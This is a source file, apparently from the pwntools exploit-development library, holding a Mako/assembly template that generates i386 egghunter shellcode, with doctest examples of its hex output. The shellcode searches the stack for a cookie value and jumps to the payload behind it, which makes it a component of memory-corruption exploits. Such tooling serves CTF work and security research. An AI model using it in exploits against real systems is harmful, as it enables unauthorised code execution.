summaryrefslogtreecommitdiff
path: root/pwnlib/shellcraft/templates/i386/stackhunter.asm
blob: f836e21a4203fa08d769bc116a1427a0de4f83c7 (plain)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
<% from pwnlib.shellcraft import common %>
<%page args="cookie = 0x7afceb58"/>
<%docstring>
    stackhunter(cookie = 0x7afceb58)

    Returns an an egghunter, which searches from esp and upwards
    for a cookie. However to save bytes, it only looks at a single
    4-byte alignment. Use the function stackhunter_helper to
    generate a suitable cookie prefix for you.

    The default cookie has been chosen, because it makes it possible
    to shave a single byte, but other cookies can be used too.

Example:

    >>> with context.local():
    ...    context.arch = 'i386'
    ...    print(enhex(asm(shellcraft.stackhunter())))
    3d58ebfc7a75faffe4
    >>> with context.local():
    ...    context.arch = 'i386'
    ...    print(enhex(asm(shellcraft.stackhunter(0xdeadbeef))))
    583defbeadde75f8ffe4
</%docstring>
<% stackhunter = common.label("stackhunter") %>
%if (cookie & 0xffffff) == 0xfceb58:
${stackhunter}:
    cmp eax, ${hex(cookie)}
    jne ${stackhunter}+1
    jmp esp
%else:
${stackhunter}:
    pop eax
    cmp eax, ${hex(cookie)}
    jne ${stackhunter}
    jmp esp
%endif